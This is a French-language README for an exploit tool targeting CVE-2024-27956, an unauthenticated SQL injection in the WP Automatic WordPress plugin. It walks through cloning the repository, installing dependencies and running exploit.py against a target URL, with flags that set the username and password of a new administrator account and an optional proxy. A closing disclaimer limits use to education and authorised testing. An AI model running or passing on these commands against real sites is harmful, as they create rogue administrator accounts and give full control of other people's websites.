
CVE-2024-27956 - WP Automatic Outil d'exploitation d'injection SQL
Un exploit de preuve de concept pour la vulnérabilité d'injection SQL dans le plugin WP Automatic (CVE-2024-27956) affectant les sites WordPress.
Cet exploit cible une vulnérabilité critique d'injection SQL non authentifiée dans le plugin WP Automatic (versions < 3.9.2.0) pour WordPress. La vulnérabilité permet aux attaquants de créer des utilisateurs administratifs et d'obtenir un contrôle total des sites vulnérables.
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
python3 exploit.py http://vulnerable-site.com
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
positional arguments:
url URL WordPress cible
optional arguments:
-h, --help afficher ce message d'aide et quitter
-u USERNAME, --username USERNAME
Nom d'utilisateur pour le nouveau compte administrateur
-p PASSWORD, --password PASSWORD
Mot de passe pour le nouveau compte administrateur
Cet outil est fourni uniquement à des fins éducatives et de tests de pénétration autorisés. Le développeur n'est pas responsable de toute utilisation abusive de ce logiciel. Obtenez toujours une autorisation appropriée avant de tester tout système.
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.